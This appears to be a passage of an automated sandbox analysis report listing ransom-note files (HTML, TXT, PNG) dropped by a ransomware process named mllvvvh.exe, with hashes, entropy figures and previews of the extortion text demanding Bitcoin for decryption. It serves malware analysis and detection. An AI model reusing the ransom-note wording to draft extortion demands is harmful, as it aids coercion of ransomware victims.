                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
